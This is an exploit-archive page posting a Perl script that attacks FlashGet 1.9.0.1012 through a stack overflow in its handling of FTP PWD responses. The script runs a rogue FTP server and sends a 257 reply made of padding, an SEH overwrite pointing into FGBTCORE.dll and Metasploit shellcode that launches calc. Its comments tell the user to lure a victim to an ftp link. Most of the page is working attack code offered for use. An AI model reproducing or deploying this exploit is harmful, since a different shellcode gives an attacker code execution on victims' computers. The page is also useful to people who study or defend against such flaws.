what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

flashget190-overflow.txt

flashget190-overflow.txt
Posted Aug 16, 2008
Authored by skOd

FlashGet version 1.9.0.1012 FTP PWD Response SEH stack overflow exploit.

tags | exploit, overflow
SHA-256 | 0999f84090712d0d9b6a50064b2335063f19efb2bba617ce908e6a3735abfd8b

flashget190-overflow.txt

Change Mirror Download
#!/usr/bin/perl
# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Coded By SkOd, skod.uk at gmail dot com
# Tested over Windows XP sp1 Hebrew
# link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer.

##
# PoC by Krystian Kloskowski (h07) <h07@interia.pl>
# http://milw0rm.com/exploits/6240

##
# special thanks to a friend of mine who helped me

use IO::Socket;

####################################[ Parameters ]########################################
my $SHELLCODE =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b".
"\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x6b\xa3\x88\x55".
"\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x4b\xa2\xe8\x59".
"\xe0\x97\x88\x11\x85\x92\xc3\x89\xc7\x27\xc3\x64\x6c\x62\xc9\x1d".
"\x6a\x61\xe8\xe4\x50\xf7\x27\x14\x1e\x46\x88\x4f\x4f\xa2\xe8\x76".
"\xe0\xaf\x48\x9b\x34\xbf\x02\xfb\xe0\xbf\x88\x11\x80\x2a\x5f\x34".
"\x6f\x60\x32\xd0\x0f\x28\x43\x20\xee\x63\x7b\x1c\xe0\xe3\x0f\x9b".
"\x1b\xbf\xae\x9b\x03\xab\xe8\x19\xe0\x23\xb3\x10\x6b\xa3\x88\x78".
"\x57\xfc\x32\xe6\x0b\xf5\x8a\xe8\xe8\x63\x78\x40\x03\x53\x89\x14".
"\x34\xcb\x9b\xee\xe1\xad\x54\xef\x8c\xc0\x62\x7c\x08\xa3\x03\x10";
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

# The Host that will be listen to the Download request from Flashget
my $HOST = '127.0.0.1'; #your own ip
#################################[Don't Edit From Here]#####################################


######################################[Defines]#############################################
my $PADDING_CHAR = "A";
my $PADDING_SIZE = 324;

#The code will return to next_seh_chain so i make it as jump and invalid address
#so it will be decoded as last in chain.
my $NEXT_SEH_IN_CHAIN = "\xEB\x06\xFF\xFF"; # JMP +6

#Settings Return Address
my $CUR_SEH_ADDRESS = "\x8B\x19\x01\x10";
# Chosen Ret Addr is : 0x1001198B FlashGet\FGBTCORE.dll v1.0. 0.36
# 1001198B 5E POP ESI
# 1001198C 5B POP EBX
# 1001198D C3 RETN

# Building SEH Block
my $SEH_BLOCK = $NEXT_SEH_IN_CHAIN .
$CUR_SEH_ADDRESS;

#Creating Payload
$PAYLOAD = $PADDING_CHAR x $PADDING_SIZE;
$PAYLOAD .= $SEH_BLOCK;
$PAYLOAD .= $SHELLCODE;
$PAYLOAD .= "\x90" x 300; #Putting alot of nops so the code will get Exception that we write after stack is over
#witch will make it to call our code

$LISTEN_PORT = 21;
##########################################################################
print "# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit\r\n";
print "# Coded By SkOd, skod.uk\x40gmail\x2ecom\r\n";

my $serverSocket = new IO::Socket::INET (Listen => 1,
LocalAddr => $HOST,
LocalPort => $LISTEN_PORT,
Proto => 'tcp');
do
{
print "\r\n[~] listening...\r\n";
$clientSocket = $serverSocket->accept();
print "[+] New Connection Recived\r\n";

$clientSocket->send("220 WELCOME!\r\n");
$isPayloadSent = 0;

while($isPayloadSent == 0) {
$clientSocket->recv($recvBuffer,1024);
print "[~] Recived: " . $recvBuffer;

if($recvBuffer =~ /USER/) {
$clientSocket->send("331 Password required for l33t\r\n");
} elsif($recvBuffer =~ /PASS/) {
$clientSocket->send("230 User l33t logged in.\r\n");
} else {
$clientSocket->send("257 \"$PAYLOAD\"\r\n");
print("[+] The payload has been sent...\r\n");
$isPayloadSent = 1;
}
}

$clientSocket->close();

} while (true);


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close